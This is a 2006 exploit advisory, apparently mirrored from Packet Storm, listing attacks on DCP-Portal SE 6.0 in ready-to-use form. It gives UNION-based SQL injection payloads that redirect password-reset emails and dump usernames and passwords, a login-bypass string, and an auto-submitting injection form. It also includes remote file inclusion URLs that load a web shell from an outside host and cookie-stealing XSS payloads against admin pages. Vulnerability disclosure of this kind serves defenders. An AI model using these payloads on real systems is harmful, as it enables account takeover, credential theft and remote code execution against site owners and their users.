Lucene search
K

DCP-PortalSE6.0.txt

🗓️ 14 Sep 2006 00:00:00Reported by HACKERS PALType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

DCP-Portal SE 6.0 multiple injections, email password reset vulnerability, SQL injection, remote file inclusion, XSS attac

Code
`Hello,,  
  
  
DCP-Portal SE 6.0 multiple injections  
  
  
Discovered By : HACKERS PAL  
Copy rights : HACKERS PAL  
Website : http://www.soqor.net  
Email Address : [email protected]  
  
sql injections  
if magic_qoutes_gpc = off  
/*************************************/  
  
lostpassword.php  
  
you can recive the reset password email on your email for any user you want :)  
change [email protected] to your real email  
example :  
-1' union select uid ,sex,name,surname,'[email protected]',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*  
  
and you will recive email reset password for all the members in this website  
  
and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid  
  
-1' union select uid ,sex,name,surname,'[email protected]',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*  
  
---------------------------  
login  
try the user name as  
' or uid=1/*  
  
or change the uid value for any username you want log with  
---------------------------  
file calendar.php  
Sql injection by post method ,, try this form :)  
  
<form name="hack" action="calendar.php" method=post>  
<input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1">  
<input type=submit>  
</form>  
  
---------------------------  
file search.php  
  
try one of these ,, bcause the number of columns changes from section to another :)  
if you searched for (content,news,link,forum)  
use  
xx%') union select uid,username,password from dcp5_members/*  
  
if you searched for (doc,anns)  
use  
xx%') union select uid,username,password,password from dcp5_members/*  
/*************************************/  
  
Remote File including  
library/lib.php?root=http://www.soqor.net/tools/cmd.txt?  
library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?  
  
/*************************************/  
  
Fill path  
library/editor/editor.php  
library/lib.php  
  
/*************************************/  
  
Xss  
admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</script><"  
admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</script>  
  
admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><"  
admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script>  
admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script>  
admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>  
  
/*************************************/  
WwW.SoQoR.NeT  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Sep 2006 00:00Current
7.4High risk
Vulners AI Score7.4
25